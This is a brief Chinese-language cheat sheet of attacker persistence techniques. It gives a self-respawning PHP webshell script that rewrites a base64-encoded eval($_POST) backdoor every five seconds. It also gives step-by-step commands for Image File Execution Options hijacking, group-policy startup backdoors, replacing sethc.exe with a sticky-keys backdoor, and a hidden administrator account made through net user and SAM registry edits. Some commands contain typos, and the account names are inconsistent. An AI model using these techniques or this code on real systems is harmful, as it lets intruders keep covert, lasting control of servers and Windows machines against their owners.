不死马权限维持
<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo"xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+";//c
$txt=base64_decode($txt);
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>映像劫持技术
进入注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File
Execution Options在下面添加一项,这里的命名与后续要触发的可执行文件程序文件名一致,这里我新建coleak.exe为后门文件,然后在coleak.exe的右侧新建一个Debugger,在输入值的栏目中填入你的后门绝对路径径,修改一个文件的文件名为coleak.exe 双击 即可触发。
运行命名为coleak.exe的文件时将会被替代为运行s.exe
策略组脚本维持
输入gpedit.msc 打开组策略,打开 windows设置 脚本 里面又关机和开机
在C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup上传s.exe(或者直接选择c盘中的s.exe), 启动时选择该文件即可
shift粘滞键后门
更改sethc.exe拥有者 为administrator
move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\s.exe C:\windows\system32\sethc.exe建立影子账号
创建一个带$符号的账户,因为在常规cmd下是无法查看到的。
net user coleak$ p-0p-0p-0 /add
net localgroup administrators coleak$ /add
net users打开注册表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User
3ea是coleak$用户 1F4是超级管理员的值
将1F4下F项的值复制到3ea下F项里面,替换原有数据。然后导出coleak$以及3EA
ner user moonsec$ /del 删除这个用户 再导入注册表 用户已经不显示在这个面板了。
